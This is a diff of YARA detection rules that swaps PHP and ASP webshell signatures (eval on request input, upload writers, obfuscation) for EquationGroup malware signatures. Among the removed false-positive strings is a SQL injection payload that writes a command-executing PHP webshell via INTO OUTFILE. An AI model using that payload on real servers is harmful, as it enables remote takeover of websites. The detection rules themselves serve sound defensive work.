-		logic_hash = "0652a4cb0cb6c61afece5c2e4cbf2f281714509f0d828047f2e3ccd411602115"
+		logic_hash = "f67a64ae7fece949d37367d85a28a879e90844e5cc56e88a85a1cce890990f55"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
 
 	strings:
-		$hta = "AddType application/x-httpd-php .htaccess" wide ascii
+		$x1 = "LSADUMP - - ERROR - - Injected" fullword wide
 
 	condition:
-		filesize < 100KB and $hta
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Function_Via_Get : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Mstcp32 : FILE
 {
 	meta:
-		description = "Webshell which sends eval/assert via GET"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5fef1063-2f9f-516e-86f6-cfd98bb05e6e"
-		date = "2021-01-09"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2774-L2818"
+		description = "EquationGroup Malware - file mstcp32.sys"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bed26a7b-933f-5578-b65c-65179959050d"
+		date = "2017-01-13"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1464-L1485"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ce739d65c31b3c7ea94357a38f7bd0dc264da052d4fd93a1eabb257f6e3a97a6"
-		hash = "d870e971511ea3e082662f8e6ec22e8a8443ca79"
-		hash = "73fa97372b3bb829835270a5e20259163ecc3fdbf73ef2a99cb80709ea4572be"
-		logic_hash = "309203db8e7374531d359e3a723418d47bead45034c4a7bd726fb714622dc039"
+		logic_hash = "aff97f8360a0c24bfde6a1b2616749d6cad3b19993716231d32b8bb59579c638"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
 
 	strings:
-		$sr0 = /\$_GET\s?\[.{1,30}\]\(\$_GET\s?\[/ wide ascii
-		$sr1 = /\$_POST\s?\[.{1,30}\]\(\$_GET\s?\[/ wide ascii
-		$sr2 = /\$_POST\s?\[.{1,30}\]\(\$_POST\s?\[/ wide ascii
-		$sr3 = /\$_GET\s?\[.{1,30}\]\(\$_POST\s?\[/ wide ascii
-		$sr4 = /\$_REQUEST\s?\[.{1,30}\]\(\$_REQUEST\s?\[/ wide ascii
-		$sr5 = /\$_SERVER\s?\[HTTP_.{1,30}\]\(\$_SERVER\s?\[HTTP_/ wide ascii
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$s1 = "mstcp32.sys" fullword wide
+		$s2 = "p32.sys" fullword ascii
+		$s3 = "\\Registry\\User\\CurrentUser\\" wide
+		$s4 = "\\DosDevices\\%ws" wide
+		$s5 = "\\Device\\%ws_%ws" wide
+		$s6 = "sys\\mstcp32.dbg" fullword ascii
+		$s7 = "%ws%03d%ws%wZ" fullword wide
+		$s8 = "TCP/IP driver" fullword wide
+		$s9 = "\\Device\\%ws" wide
 
 	condition:
-		filesize < 500KB and not ( any of ( $gfp* ) ) and any of ( $sr* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 7 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Writer : FILE
+rule SIGNATURE_BASE_Equationgroup_Nethide_Lp : FILE
 {
 	meta:
-		description = "PHP webshell which only writes an uploaded file to disk"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "05bb3e0c-69b2-5176-a3eb-e6ba2d72a205"
-		date = "2021-04-17"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2820-L2910"
+		description = "EquationGroup Malware - file nethide_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39e96239-2189-5993-90ba-27e47f7bfdea"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1487-L1504"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ec83d69512aa0cc85584973f5f0850932fb1949fb5fb2b7e6e5bbfb121193637"
-		hash = "407c15f94a33232c64ddf45f194917fabcd2e83cf93f38ee82f9720e2635fa64"
-		hash = "988b125b6727b94ce9a27ea42edc0ce282c5dfeb"
-		hash = "0ce760131787803bbef216d0ee9b5eb062633537"
-		hash = "20281d16838f707c86b1ff1428a293ed6aec0e97"
-		logic_hash = "34bae0c02156d1c9fd24d674443322409eba0a43e094fc6c05df94bbbe15aa64"
-		score = 50
-		quality = 17
+		logic_hash = "70e96a8ef5f75e05b3f6d32b9b8392316c3a70cb479549a3700134435b690473"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
 
 	strings:
-		$sus3 = "'upload'" wide ascii
-		$sus4 = "\"upload\"" wide ascii
-		$sus5 = "\"Upload\"" wide ascii
-		$sus6 = "gif89" wide ascii
-		$sus16 = "Army" fullword wide ascii
-		$sus17 = "error_reporting( 0 )" wide ascii
-		$sus18 = "' . '" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$inp1 = "php://input" wide ascii
-		$inp2 = /_GET\s?\[/ wide ascii
-		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
-		$inp4 = /_POST\s?\[/ wide ascii
-		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
-		$inp6 = /_REQUEST\s?\[/ wide ascii
-		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
-		$inp15 = "_SERVER['HTTP_" wide ascii
-		$inp16 = "_SERVER[\"HTTP_" wide ascii
-		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
-		$inp18 = "array_values($_SERVER)" wide ascii
-		$inp19 = /file_get_contents\("https?:\/\// wide ascii
-		$php_multi_write1 = "fopen(" wide ascii
-		$php_multi_write2 = "fwrite(" wide ascii
-		$php_write1 = "move_uploaded_file" fullword wide ascii
-		$php_write2 = "copy" fullword wide ascii
+		$x1 = "Error: Attempt to hide all TCP connections (any:any)." fullword wide
+		$x2 = "privilegeRunInKernelMode failed" fullword wide
+		$x3 = "Failed to unhide requested connection" fullword wide
+		$x4 = "Nethide running in USER_MODE" fullword wide
+		$x5 = "Not enough slots for all of the list.  Some entries may have not been hidden." fullword wide
 
 	condition:
-		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $php_write* ) or all of ( $php_multi_write* ) ) and ( filesize < 400 or ( filesize < 4000 and 1 of ( $sus* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Writer : FILE
+rule SIGNATURE_BASE_Equationgroup_PC_Level4_Flav_Dll_X64 : FILE
 {
 	meta:
-		description = "ASP webshell which only writes an uploaded file to disk"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a1310e22-f485-5f06-8f1a-4cf9ae8413a1"
-		date = "2021-03-07"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2912-L3082"
+		description = "EquationGroup Malware - file PC_Level4_flav_dll_x64"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f05dd0b6-106c-5d1d-ba09-4ac3035e7030"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1506-L1521"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "df6eaba8d643c49c6f38016531c88332e80af33c"
-		hash = "83642a926291a499916e8c915dacadd0d5a8b91f"
-		hash = "5417fad68a6f7320d227f558bf64657fe3aa9153"
-		hash = "97d9f6c411f54b56056a145654cd00abca2ff871"
-		hash = "fc44fd7475ee6c0758ace2b17dd41ed7ea75cc73"
-		logic_hash = "7c9f4c9a5005efad02760cf9ba3ea946068ae281cda10215bf8c88f209b582a5"
-		score = 60
-		quality = -75
+		logic_hash = "9c874581567909055deeae4f992bd99c1e08d5f62655d1cc9a7316beb8513d8f"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
 
 	strings:
-		$sus1 = "password" fullword wide ascii
-		$sus2 = "pwd" fullword wide ascii
-		$sus3 = "<asp:TextBox" fullword nocase wide ascii
-		$sus4 = "\"upload\"" wide ascii
-		$sus5 = "\"Upload\"" wide ascii
-		$sus6 = "gif89" wide ascii
-		$sus7 = "\"&\"" wide ascii
-		$sus8 = "authkey" fullword wide ascii
-		$sus9 = "AUTHKEY" fullword wide ascii
-		$sus10 = "test.asp" fullword wide ascii
-		$sus11 = "cmd.asp" fullword wide ascii
-		$sus12 = ".Write(Request." wide ascii
-		$sus13 = "<textarea " wide ascii
-		$sus14 = "\"unsafe" fullword wide ascii
-		$sus15 = "'unsafe" fullword wide ascii
-		$sus16 = "Army" fullword wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$s1 = "wship.dll" fullword wide
+		$s2 = "   IP:      " fullword ascii
+		$s3 = "\\\\.\\%hs" fullword ascii
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) and ( filesize < 400 or ( filesize < 6000 and 1 of ( $sus* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_OBFUSC : FILE
+rule SIGNATURE_BASE_Equationgroup_PC_Level4_Flav_Exe : FILE
 {
 	meta:
-		description = "ASP webshell obfuscated"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3960b692-9f6f-52c5-b881-6f9e1b3ac555"
-		date = "2021-01-12"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3084-L3359"
+		description = "EquationGroup Malware - file PC_Level4_flav_exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eb93a798-4e7e-52dc-a39b-bfb63a58d250"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1523-L1541"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ad597eee256de51ffb36518cd5f0f4aa0f254f27517d28fb7543ae313b15e112"
-		hash = "e0d21fdc16e0010b88d0197ebf619faa4aeca65243f545c18e10859469c1805a"
-		hash = "54a5620d4ea42e41beac08d8b1240b642dd6fd7c"
-		hash = "fc44fd7475ee6c0758ace2b17dd41ed7ea75cc73"
-		hash = "be2fedc38fc0c3d1f925310d5156ccf3d80f1432"
-		hash = "3175ee00fc66921ebec2e7ece8aa3296d4275cb5"
-		hash = "d6b96d844ac395358ee38d4524105d331af42ede"
-		hash = "cafc4ede15270ab3f53f007c66e82627a39f4d0f"
-		logic_hash = "96369062f963c3604c05808755fdfca922e5a6da960cb0ee05dee2df72d5d69b"
+		logic_hash = "975d327d5922e4b179a677501c2613186ea85299958a996dcdeb503b02495ff7"
 		score = 75
-		quality = -117
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "33ba9f103186b6e52d8d69499512e7fbac9096e7c5278838127488acc3b669a9"
 
 	strings:
-		$asp_obf1 = "/*-/*-*/" wide ascii
-		$asp_obf2 = "u\"+\"n\"+\"s" wide ascii
-		$asp_obf3 = "\"e\"+\"v" wide ascii
-		$asp_obf4 = "a\"+\"l\"" wide ascii
-		$asp_obf5 = "\"+\"(\"+\"" wide ascii
-		$asp_obf6 = "q\"+\"u\"" wide ascii
-		$asp_obf7 = "\"u\"+\"e" wide ascii
-		$asp_obf8 = "/*//*/" wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = ".Start" wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
-		$o4 = "\\x8" wide ascii
-		$o5 = "\\x9" wide ascii
-		$o6 = "\\61" wide ascii
-		$o7 = "\\44" wide ascii
-		$o8 = "\\112" wide ascii
-		$o9 = "\\120" wide ascii
-		$m_multi_one1 = "Replace(" wide ascii
-		$m_multi_one2 = "Len(" wide ascii
-		$m_multi_one3 = "Mid(" wide ascii
-		$m_multi_one4 = "mid(" wide ascii
-		$m_multi_one5 = ".ToString(" wide ascii
-		$m_fp1 = "Author: Andre Teixeira - andret@microsoft.com"
-		$m_fp2 = "DataBinder.Eval(Container.DataItem" ascii wide
-		$oo1 = /\w\"&\"\w/ wide ascii
-		$oo2 = "*/\").Replace(\"/*" wide ascii
+		$s1 = "Extended Memory Runtime Process" fullword wide
+		$s2 = "memess.exe" fullword wide
+		$s3 = "\\\\.\\%hs" fullword ascii
+		$s4 = ".?AVOpenSocket@@" fullword ascii
+		$s5 = "Corporation. All rights reserved." fullword wide
+		$s6 = "itanium" fullword wide
 
 	condition:
-		filesize < 100KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) and ( ( ( filesize < 100KB and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 20 ) ) or ( filesize < 5KB and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 5 or ( ( #m_multi_one1 + #m_multi_one2 + #m_multi_one3 + #m_multi_one4 + #m_multi_one5 ) > 3 ) ) ) or ( filesize < 700 and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 3 or ( #m_multi_one1 + #m_multi_one2 + #m_multi_one3 + #m_multi_one4 + #m_multi_one5 ) > 2 ) ) ) or any of ( $asp_obf* ) ) or ( ( filesize < 100KB and ( ( #oo1 ) > 2 or $oo2 ) ) or ( filesize < 25KB and ( ( #oo1 ) > 1 ) ) or ( filesize < 1KB and ( ( #oo1 ) > 0 ) ) ) ) and not any of ( $m_fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Eval_On_Input : FILE
+rule SIGNATURE_BASE_Equationgroup_Processinfo_Implant : FILE
 {
 	meta:
-		description = "Generic ASP webshell which uses any eval/exec function directly on user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3361-L3465"
+		description = "EquationGroup Malware - file processinfo_Implant.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b110d819-2298-507b-91bb-2787bb11322e"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1543-L1558"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d6b96d844ac395358ee38d4524105d331af42ede"
-		hash = "9be2088d5c3bfad9e8dfa2d7d7ba7834030c7407"
-		hash = "a1df4cfb978567c4d1c353e988915c25c19a0e4a"
-		hash = "069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6"
-		logic_hash = "f7b9f43cf2fd6d08b7438f003242e9a19dcea282959c7a1fdff3a35e261a031e"
+		logic_hash = "b0aace3c6fa20c5bb238264b2aa484d548945a4c2ccb65482cce71427f061604"
 		score = 75
-		quality = 1
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "aadfa0b1aec4456b10e4fb82f5cfa918dbf4e87d19a02bcc576ac499dda0fb68"
 
 	strings:
-		$payload_and_input0 = /\beval_r\s{0,20}\(Request\(/ nocase wide ascii
-		$payload_and_input1 = /\beval[\s\(]{1,20}request[.\(\[]/ nocase wide ascii
-		$payload_and_input2 = /\bexecute[\s\(]{1,20}request\(/ nocase wide ascii
-		$payload_and_input4 = /\bExecuteGlobal\s{1,20}request\(/ nocase wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s1 = "hZwOpenProcessToken" fullword ascii
+		$s2 = "hNtQueryInformationProcess" fullword ascii
+		$s3 = "No mapping" fullword wide
 
 	condition:
-		( filesize < 1100KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $payload_and_input* ) ) or ( filesize < 100 and any of ( $payload_and_input* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Nano : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_2 : FILE
 {
 	meta:
-		description = "Generic ASP webshell which uses any eval/exec function"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5f2f24c2-159d-51e1-80d9-11eeb77e8760"
-		date = "2021-01-13"
